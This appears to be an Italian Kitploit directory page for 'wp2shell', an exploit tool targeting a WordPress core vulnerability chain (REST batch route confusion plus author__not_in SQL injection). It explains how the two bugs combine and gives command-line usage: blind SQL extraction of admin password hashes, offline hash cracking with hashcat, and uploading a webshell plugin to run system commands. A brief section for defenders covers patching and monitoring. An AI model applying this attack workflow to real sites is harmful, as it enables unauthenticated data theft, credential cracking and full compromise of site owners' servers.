Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
wp2shell-Wordpress-TOWN — L'esecuzione remota di codice (RCE) non autenticata nel core di WordPress consente agli attaccanti di eseguire codice arbitrario senza effettuare l'accesso, concatenando CVE-2026-63030 e CVE-2026-60137, con il potenziale rischio di compromissione completa del sito. | Kitploit
Strumenti/GitHubGitHub/lucifer0xf/wp2shell-wordpress-town
Scanner di VulnerabilitàAnalisi del CodiceExploitSicurezza WebCTFApprendimento e Formazione
GitHublucifer0xf/wp2shell-wordpress-town

wp2shell-Wordpress-TOWN

L'esecuzione remota di codice (RCE) non autenticata nel core di WordPress consente agli attaccanti di eseguire codice arbitrario senza effettuare l'accesso, concatenando CVE-2026-63030 e CVE-2026-60137, con il potenziale rischio di compromissione completa del sito.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
211 mese faNon ancora revisionato

wp2shell di : lucifer0xf

Banner

Esecuzione remota di codice non autenticata per il POC del core di WordPress (CVE-2026-63030 + CVE-2026-60137)

wp2shell exploit per la catena di vulnerabilità critiche nel core di WordPress. Combina un bug di confusione delle route batch dell'API REST con un'iniezione SQL in WP_Query per ottenere esecuzione remota di codice non autenticata sulle installazioni WordPress vulnerabili.

DettaglioInformazioni
CVECVE-2026-63030 (confusione route batch REST) + CVE-2026-60137 (author__not_in SQLi)
Versioni interessateWordPress 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
Corretta in6.9.5, 7.0.2
Autenticazione richiestaNessuna — non autenticata
CVSSCritico (catena RCE)
Scoperto daAdam Kues (Assetnote / Searchlight Cyber)
DipendenzePython 3.8+ — solo libreria standard

Come Funziona

L'exploit combina due bug nel core di WordPress:

  1. CVE-2026-60137 — SQL Injection – Quando author__not_in viene passato come stringa invece di un array, WordPress salta il controllo di sanificazione is_array() e interpola il valore grezzo in una clausola SQL NOT IN (...).

  2. CVE-2026-63030 — Confusione delle Route Batch – L'endpoint /wp-json/batch/v1 costruisce array paralleli $matches e $validation. Una sotto-richiesta malformata viene aggiunta a $validation ma non a $matches, causando uno spostamento dell'indice di +1. La sotto-richiesta i viene inviata con il gestore della sotto-richiesta i+1.

Combinate insieme: Una richiesta POST /wp/v2/posts contenente una richiesta interna GET /wp/v2/users con una stringa author_exclude bypassa sia la allow-list dei metodi che la sanificazione degli input. La stringa arriva a WP_Query come author__not_in e viene interpolata in SQL — fornendo iniezione SQL cieca non autenticata.

Da qui, lo strumento può:

  • Estrarre l'hash della password dell'amministratore
  • Autenticarsi come admin (una volta craccato l'hash)
  • Caricare un plugin dannoso
  • Eseguire comandi di sistema arbitrari

Funzionalità


Installazione

root@kitploit:~
git clone https://github.com/lucifer0xf/wp2shell-Wordpress-TOWN.git
cd wp2shell-Wordpress-TOWN
chmod +x wp2shell.py

Tutto qui. Nessun pacchetto di terze parti richiesto.


Utilizzo

root@kitploit:~
./wp2shell.py <url> [command] [options]

Modalità Interattiva (Basata su Menu)

root@kitploit:~
./wp2shell.py http://target.com

Avvia un menu interattivo con tutte le funzionalità disponibili tramite opzioni numerate.

Comandi

check — Conferma la Vulnerabilità (Sicuro)

Esegue una sonda a ritardo temporale per confermare la sfruttabilità. Non legge dati e non modifica nulla.

root@kitploit:~
./wp2shell.py http://target.com check

read — Estrai Dati (Iniezione SQL Cieca)

Estrae informazioni dal database utilizzando l'iniezione SQL cieca basata sul tempo.

root@kitploit:~
# Server fingerprint (version, database, user)
./wp2shell.py http://target.com read

# Extract user logins and password hashes
./wp2shell.py http://target.com read --users

# Extract database name
./wp2shell.py http://target.com read --database

# Extract MySQL version
./wp2shell.py http://target.com read --version

# Custom SQL query
./wp2shell.py http://target.com read --query "SELECT @@version"

shell — Esecuzione Remota di Codice

Richiede credenziali di amministratore valide. L'iniezione SQL può recuperare l'hash della password, ma devi fornire la password in chiaro recuperata.

root@kitploit:~
# Execute a single command
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd "id"

# Execute a single command (short form)
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd whoami

Opzioni


Workflow di Esempio

root@kitploit:~
# 1. Check if the target is vulnerable
./wp2shell.py https://example.com check

# 2. Extract admin password hashes
./wp2shell.py https://example.com read --users

# 3. Crack the hash offline (using hashcat, john, etc.)
# hashcat -m 400 <hash> /path/to/wordlist.txt

# 4. Execute a command with the recovered password
./wp2shell.py https://example.com shell --user admin --password 'cracked_pass' --cmd "id"

Versioni Interessate

RamoVulnerabiliCorretta
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x6.8.0 – 6.8.5 (solo SQLi, nessuna RCE)6.8.6

Le versioni precedenti alla 6.9.0 non sono interessate dall'intera catena RCE.


Rilevamento e Mitigazione

Per i Difensori:

  • Aggiorna subito a 6.9.5, 7.0.2 o versioni successive
  • I clienti Cloudflare WAF sono protetti automaticamente
  • I clienti Wordfence dispongono di regole firewall
  • Monitora le richieste POST /wp-json/batch/v1 con corpi requests annidati
  • Un 404 sulla route batch non significa sempre "corretto" — può anche significare che un WAF/CDN sta bloccando l'accesso anonimo alle API REST

Disclaimer Legale

Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati.


Crediti

  • Scoperta: Adam Kues (Assetnote / Searchlight Cyber)
  • CVE-2026-60137 (SQLi): TF1T, dtro, haongo
  • CVE-2026-63030 (Confusione route batch): Adam Kues
Scarica lo strumento
FunzionalitàDescrizione
Verifica della vulnerabilitàSonda sicura a ritardo temporale — non legge dati, non modifica nulla
Estrazione dei datiIniezione SQL cieca con ottimizzazione della ricerca binaria per un'estrazione efficiente
Dump degli hash utenteEstrae gli hash user_login e user_pass da wp_users
Esecuzione remota di codiceAutenticati come admin, carica un plugin webshell, esegui comandi
Shell interattivaSessione di esecuzione comandi persistente
Output a coloriFeedback visivo chiaro per i risultati della scansione
Nessuna dipendenzaUsa solo la libreria standard di Python
OpzioneDescrizione
--usersEstrae user_login e user_pass da wp_users
--databaseEstrae il nome del database corrente
--versionEstrae la versione di MySQL
--query "SQL"Esegue una query SQL personalizzata (estrazione cieca)
--user USERNome utente admin per la RCE
--password PASSPassword admin per la RCE (in chiaro, recuperata tramite SQLi)
--cmd CMDComando da eseguire tramite la webshell